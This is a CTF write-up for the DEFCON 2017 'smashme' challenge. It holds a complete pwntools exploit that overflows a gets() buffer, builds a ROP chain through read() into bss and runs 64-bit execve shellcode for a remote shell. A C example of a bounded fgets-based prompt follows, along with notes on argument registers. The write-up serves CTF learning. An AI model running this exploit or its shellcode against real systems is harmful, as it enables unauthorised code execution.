DEFCON 2017 smashme
Pwnable/CTF, 2017. 5. 2. 23:16

```python
from pwn import *

p = remote("192.168.146.133", 9001)
elf = ELF("./smashme")
read_plt = elf.symbols["read"]
bss = elf.bss() + 0x20           # writable scratch area used for the second read

# 64-bit syscall shellcode (shell-storm shellcode-806, linked below)
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

# gadgets that load rsi / rdi / rdx (addresses taken from the binary)
shell_rsi = 0x004015f7
shell_rdi = 0x004014d6
shell_rdx = 0x00441e46

# the string the binary checks before it returns, padded up to the saved return address
filt = b"Smash me outside, how bout dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

payload = filt
payload += p64(shell_rsi)
payload += p64(bss)              # rsi = bss
payload += p64(shell_rdi)
payload += p64(0)                # rdi = 0 (stdin)
payload += p64(shell_rdx)
payload += p64(len(shellcode))   # rdx = number of bytes to read
payload += p64(read_plt)         # read(0, bss, len(shellcode))
payload += p64(bss)              # then return into what was just read

p.sendline(payload)
p.sendline(shellcode)
p.interactive()
```
Opening the binary in IDA shows a buffer overflow: input is read with the gets function.
You will also see a single branch: if the input is not that string (the one in the filt variable) the program QUITs; if it matches, it proceeds normally to leave; ret.
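As an added example (not code from the original post or the challenge binary), here is how the gets()-based prompt described above could be written so that it can never write past its buffer. It assumes a 64-byte buffer and a prefix compare against the greeting string, and uses tmpfile() only to feed constructed lines through the same fgets path.

```c
#include <stdio.h>
#include <string.h>

/* Greeting the binary compares against (from the writeup). That compare runs
   only after gets() has already written past the buffer, so it is not a
   defence; bounding the read is. BUF_SIZE is an assumed buffer size. */
#define GREETING "Smash me outside, how bout dA"
#define BUF_SIZE 64
#define A16 "AAAAAAAAAAAAAAAA"
/* Constructed input shaped like the page's payload prefix: greeting + 80 'A'. */
#define OVERLONG_LINE GREETING A16 A16 A16 A16 A16 "\n"

enum { PROMPT_OK = 0, PROMPT_QUIT = 1, PROMPT_OVERLONG = 2 };

/* Bounded replacement for the gets() prompt: writes at most bufsize bytes,
   drains the rest of an over-long line so it cannot spill into a later read,
   and reports the over-long case so the caller can log it. */
int hardened_prompt(FILE *in, char *buf, size_t bufsize)
{
    int overlong = 0, c;
    if (bufsize == 0) return PROMPT_QUIT;
    buf[0] = '\0';
    if (fgets(buf, (int)bufsize, in) == NULL) return PROMPT_QUIT;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n')
        buf[n - 1] = '\0';                  /* whole line fit: drop newline */
    else
        while ((c = fgetc(in)) != EOF && c != '\n')
            overlong = 1;                   /* discard what did not fit */
    if (strncmp(buf, GREETING, strlen(GREETING)) != 0)
        return PROMPT_QUIT;                 /* the binary's QUIT branch */
    return overlong ? PROMPT_OVERLONG : PROMPT_OK;
}

/* Feed a string through the prompt (via a temporary file) into a BUF_SIZE buffer. */
static int run_line(const char *line, char *buf)
{
    FILE *in = tmpfile();
    if (in == NULL) { buf[0] = '\0'; return PROMPT_QUIT; }
    fputs(line, in);
    rewind(in);
    int rc = hardened_prompt(in, buf, BUF_SIZE);
    fclose(in);
    return rc;
}

/* Result code for one input line. */
int classify_line(const char *line) { char b[BUF_SIZE]; return run_line(line, b); }

/* Bytes that actually reached the buffer (never more than BUF_SIZE - 1). */
size_t stored_length(const char *line) { char b[BUF_SIZE]; run_line(line, b); return strlen(b); }
```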
The shellcode is a 64-bit syscall shellcode (source: http://shell-storm.org/shellcode/files/shellcode-806.php).
64-bit argument registers:
1st rdi
2nd rsi
3rd rdx
4th rcx